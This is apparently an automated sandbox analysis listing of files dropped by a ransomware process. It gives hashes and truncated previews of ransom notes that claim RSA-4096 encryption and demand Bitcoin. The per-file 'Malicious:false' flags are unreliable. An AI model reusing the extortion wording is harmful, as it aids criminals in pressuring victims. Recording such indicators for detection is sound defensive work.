                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
